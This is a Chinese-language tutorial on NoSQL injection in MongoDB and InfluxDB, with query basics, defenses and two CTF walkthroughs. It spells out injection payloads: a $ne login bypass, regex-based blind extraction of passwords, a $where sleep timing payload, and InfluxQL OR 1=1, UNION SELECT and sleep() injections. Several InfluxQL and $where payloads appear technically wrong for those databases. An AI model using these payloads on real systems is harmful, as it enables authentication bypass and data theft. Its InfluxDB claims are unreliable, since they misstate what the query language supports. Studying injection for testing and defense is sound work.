NoSQL注入从0到1：MongoDB与InfluxDB实战指南<\/h1>

1. NoSQL数据库概述<\/h2>
NoSQL数据库与传统SQL数据库的主要区别：<\/p>
非关系型数据模型<\/li>
无固定表结构<\/li>
水平可扩展性<\/li>
高性能读写<\/li>
弱一致性或最终一致性<\/li> <\/ul>
2. MongoDB注入技术<\/h2>

2.1 MongoDB基础查询语法<\/h3>
\/\/ 基本查询
<\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({username<\/span>:<\/span> "admin"<\/span>})
<\/span><\/span>
<\/span><\/span>\/\/ 条件查询
<\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({age<\/span>:<\/span> {$gt<\/span>:<\/span> 18<\/span>}})
<\/span><\/span>
<\/span><\/span>\/\/ 逻辑操作
<\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({$or<\/span>:<\/span> [{age<\/span>:<\/span> {$lt<\/span>:<\/span> 18<\/span>}}, {age<\/span>:<\/span> {$gt<\/span>:<\/span> 65<\/span>}}]})
<\/span><\/span><\/code><\/pre>2.2 MongoDB注入原理<\/h3>
当应用程序直接将用户输入拼接到查询中时，可能导致注入：<\/p>
\/\/ 不安全代码示例
<\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({username<\/span>:<\/span> req<\/span>.body<\/span>.username<\/span>, password<\/span>:<\/span> req<\/span>.body<\/span>.password<\/span>})
<\/span><\/span><\/code><\/pre>2.3 常见注入技术<\/h3>
2.3.1 绕过认证<\/h4>
\/\/ 用户输入
<\/span><\/span><\/span><\/span>username<\/span>:<\/span> admin<\/span>
<\/span><\/span>password<\/span>:<\/span> {$ne<\/span>:<\/span> ""<\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 生成查询
<\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({username<\/span>:<\/span> "admin"<\/span>, password<\/span>:<\/span> {$ne<\/span>:<\/span> ""<\/span>}})
<\/span><\/span><\/code><\/pre>2.3.2 布尔盲注<\/h4>
\/\/ 判断条件是否为真
<\/span><\/span><\/span><\/span>username<\/span>:<\/span> admin<\/span>
<\/span><\/span>password<\/span>:<\/span> {$regex<\/span>:<\/span> "^a"<\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 判断管理员用户是否存在
<\/span><\/span><\/span><\/span>username<\/span>:<\/span> {$regex<\/span>:<\/span> "^admin$"<\/span>}
<\/span><\/span><\/code><\/pre>2.3.3 时间盲注<\/h4>
\/\/ 使用$where和sleep函数
<\/span><\/span><\/span><\/span>username<\/span>:<\/span> admin<\/span>
<\/span><\/span>password<\/span>:<\/span> {$where<\/span>:<\/span> "function(){sleep(5000); return true}"<\/span>}
<\/span><\/span><\/code><\/pre>2.3.4 提取数据<\/h4>
\/\/ 逐步提取密码字符
<\/span><\/span><\/span><\/span>username<\/span>:<\/span> admin<\/span>
<\/span><\/span>password<\/span>:<\/span> {$regex<\/span>:<\/span> "^a.*"<\/span>}
<\/span><\/span>password<\/span>:<\/span> {$regex<\/span>:<\/span> "^ab.*"<\/span>}
<\/span><\/span>\/\/ 依此类推...
<\/span><\/span><\/span><\/code><\/pre>2.4 防御措施<\/h3>

使用参数化查询<\/li>
使用ORM\/ODM库(如Mongoose)<\/li>
输入验证和过滤<\/li>
最小权限原则<\/li>
<\/ol>
3. InfluxDB注入技术<\/h2>
3.1 InfluxDB基础查询语法<\/h3>
-- 基本查询
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> "measurement"<\/span> WHERE<\/span> "tag"<\/span> =<\/span> 'value'<\/span>
<\/span><\/span>
<\/span><\/span>-- 条件查询
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> "cpu"<\/span> WHERE<\/span> "usage"<\/span> ><\/span> 90<\/span>
<\/span><\/span>
<\/span><\/span>-- 时间范围查询
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> "network"<\/span> WHERE<\/span> time ><\/span> now() -<\/span> 1<\/span>h
<\/span><\/span><\/code><\/pre>3.2 InfluxDB注入原理<\/h3>
当应用程序直接将用户输入拼接到InfluxQL查询中时：<\/p>
-- 不安全代码示例
<\/span><\/span><\/span><\/span>query =<\/span> `<\/span>SELECT<\/span> *<\/span> FROM<\/span> "metrics"<\/span> WHERE<\/span> "host"<\/span> =<\/span> '${userInput}'<\/span>`<\/span>
<\/span><\/span><\/code><\/pre>3.3 常见注入技术<\/h3>
3.3.1 注释绕过<\/h4>
-- 用户输入
<\/span><\/span><\/span><\/span>host<\/span>' OR 1=1 --
<\/span><\/span><\/span>-- 生成查询
<\/span><\/span><\/span>SELECT * FROM "metrics" WHERE "host" = '<\/span>host<\/span>' OR 1=1 --'<\/span>
<\/span><\/span><\/code><\/pre>3.3.2 联合查询<\/h4>
-- 用户输入
<\/span><\/span><\/span><\/span>host<\/span>' UNION SELECT * FROM "users" --
<\/span><\/span><\/span>-- 生成查询
<\/span><\/span><\/span>SELECT * FROM "metrics" WHERE "host" = '<\/span>host<\/span>' UNION SELECT * FROM "users" --'<\/span>
<\/span><\/span><\/code><\/pre>3.3.3 布尔盲注<\/h4>
-- 用户输入
<\/span><\/span><\/span><\/span>host<\/span>' AND "value" > 100 --
<\/span><\/span><\/span>-- 通过响应差异判断条件真假
<\/span><\/span><\/span><\/code><\/pre>3.3.4 时间盲注<\/h4>
-- 用户输入
<\/span><\/span><\/span><\/span>host<\/span>' AND (SELECT count(*) FROM "users") > 0 AND sleep(5) --
<\/span><\/span><\/span><\/code><\/pre>3.4 防御措施<\/h3>

使用参数化查询<\/li>
使用InfluxDB客户端库<\/li>
限制查询权限<\/li>
输入验证和转义<\/li>
<\/ol>
4. CTF实战案例<\/h2>
4.1 MongoDB注入挑战<\/h3>
题目描述<\/strong>：登录页面，需要绕过认证获取flag。<\/p>
解题步骤<\/strong>：<\/p>

分析登录请求<\/li>
尝试JSON注入<\/li>
构造绕过查询<\/li>
获取flag<\/li>
<\/ol>
Payload示例<\/strong>：<\/p>
{
<\/span><\/span>  "username"<\/span>: {"$ne"<\/span>: ""<\/span>},
<\/span><\/span>  "password"<\/span>: {"$ne"<\/span>: ""<\/span>}
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 InfluxDB注入挑战<\/h3>
题目描述<\/strong>：监控系统查询接口，需要提取敏感数据。<\/p>
解题步骤<\/strong>：<\/p>

识别InfluxQL注入点<\/li>
尝试联合查询<\/li>
枚举measurement名称<\/li>
提取flag数据<\/li>
<\/ol>
Payload示例<\/strong>：<\/p>
host<\/span>' UNION SELECT * FROM "flags" --
<\/span><\/span><\/span><\/code><\/pre>5. 总结<\/h2>
NoSQL注入相比SQL注入有以下特点：<\/p>

语法差异大，不同数据库有不同注入方式<\/li>
通常基于操作符和JSON\/查询语言结构<\/li>
防御措施需要针对特定数据库实现<\/li>
工具支持较少，常需要手动测试<\/li>
<\/ol>
安全建议：<\/p>

永远不要信任用户输入<\/li>
使用数据库提供的安全查询方法<\/li>
实施最小权限原则<\/li>
定期进行安全审计和渗透测试<\/li>
<\/ol>